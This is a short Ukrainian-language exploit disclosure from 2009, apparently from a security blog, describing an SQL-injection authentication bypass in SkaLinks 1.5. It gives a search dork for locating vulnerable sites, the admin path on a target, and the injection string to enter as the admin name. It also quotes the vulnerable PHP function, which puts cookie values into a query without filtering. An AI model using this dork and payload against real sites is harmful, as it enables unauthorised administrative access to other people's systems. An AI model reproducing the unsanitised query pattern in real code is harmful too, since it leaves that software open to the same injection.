Обхід Авторизації (Auth Bypass) SkaLinks
April 13th, 2009
No comments
Продукт : SkaLinks
Версія : 1.5
Dork : “Powered by SkaLinks “
Офіційний сат: http://www.skalinks.com/
Вразливість знайдена: Dimi4
Тип: SQL-injection, Auth Bypass
Вразливість існує через недостатню фільтрацію вхідних даних у функціїї авторизацїї
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1′ OR 1=1/*Вразлива функція:
function IsAdmin( ) { $table_name = $this->m_AdminsTable; $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`=’".$_COOKIE['adminname']."’ AND `Password`=’".$_COOKIE['pwd']."’"); if ( !$res ) { return 0; } else { return $res; } }(c) Dimi4, 2009 greetz to UASC, antichat
Останні коментарі